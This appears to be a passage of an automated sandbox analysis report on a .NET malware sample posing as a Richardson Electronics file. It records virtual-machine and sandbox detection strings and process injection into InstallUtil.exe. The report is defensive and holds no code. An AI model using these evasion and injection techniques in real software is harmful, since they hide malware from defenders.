                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Source: Yara matchFile source: Process Memory Space: Richardson Electronics, LTD. PRD10221301UUE.exe PID: 2896, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Eggdjjrhey.exe PID: 936, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Eggdjjrhey.exe PID: 7152, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2177833444.0000000002D88000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000003.00000002.2327778523.00000000024E7000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000008.00000002.2416647323.0000000002851000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeMemory allocated: 12C0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeMemory allocated: 2D40000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeMemory allocated: 2AC0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: E20000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2B10000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4B10000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeMemory allocated: 22F0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeMemory allocated: 24A0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeMemory allocated: 44A0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: D30000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2850000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: DD0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeMemory allocated: A70000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeMemory allocated: 27A0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeMemory allocated: 26E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2CE0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2EC0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2CE0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: Eggdjjrhey.exe, 00000008.00000002.2413757983.0000000000AB6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
                        Source: Eggdjjrhey.exe, 00000008.00000002.2416647323.0000000002851000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                        Source: InstallUtil.exe, 00000005.00000002.2437678396.0000000005AD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
                        Source: Eggdjjrhey.exe, 00000008.00000002.2416647323.0000000002851000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2176292945.0000000001032000.00000004.00000020.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000003.00000002.2323632426.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.3404752463.0000000006170000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: InstallUtil.exe, 00000002.00000002.2324000943.0000000000EEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllll
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 750000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 750000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: BC6008Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 750000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 752000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 78C000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 78E000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 51C008Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: D45008Jump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeQueries volume information: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
